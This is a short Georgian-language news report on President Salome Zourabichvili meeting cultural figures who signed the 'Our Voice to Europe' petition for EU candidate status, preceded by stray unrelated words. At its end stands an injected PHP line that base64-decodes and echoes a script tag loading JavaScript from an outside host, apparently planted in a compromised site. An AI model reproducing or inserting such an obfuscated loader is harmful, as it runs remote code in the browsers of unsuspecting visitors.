celsiusi
ავერსი შნაიდერი

საქართველოს პრეზიდენტმა, სალომე ზურაბიშვილმა დღეს ორბელიანების სასახლეში კულტურის სფეროს წარმომადგენლებს უმასპინძლა, რომლებიც ხელმოწერების კამპანიას, „ჩვენი ხმა ევროპას“ შეუერთდნენ.

კულტურის სფეროს წარმომადგენლებს სიტყვით მიმართა საქართველოს პრეზიდენტმა და საქართველოს ევროპული ინტეგრაციის პროცესის მნიშვნელობაზე ისაუბრა.

„ევროინტეგრაციის [პროცესი] არის გზა, რომელიც საქართველოს ევროპულ ოჯახში დაბრუნების გზაა. შეიძლება, ამან მიიღოს მრავალი სხვადასხვა ფორმა, მაგრამ ჩვენ ვიცით, რომ აქ უკან დახევა არ არსებობს, უკან დახევა არის საქართველოს დამთავრება. ასე რომ, ჩვენ წინ მივდივართ. პირველ რიგში, თქვენ მიდიხართ წინ და ჩვენ, ყველანი თქვენ მოგყვებით“, – განაცხადა სალომე ზურაბიშვილმა.

ხელმოწერების კამპანია, „ჩვენი ხმა ევროპას“ 8 ნოემბერს საქართველოს პრეზიდენტის ინიციატივით დაიწყო და საქართველოსთვის ევროკავშირის კანდიდატის სტატუსის მოთხოვნით ევროკავშირის ლიდერებისადმი მიმართვას ითვალისწინებს. კამპანიაში საზოგადოების სხვადასხვა სფეროს წარმომადგენლები ერთვებიან და პეტიციაზე ხელმოწერით თავიანთ მხარდაჭერას გამოხატავენ.

ინფორმაციას საქართველოს პრეზიდენტის ადმინისტრაცია ავრცელებს. 

189
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");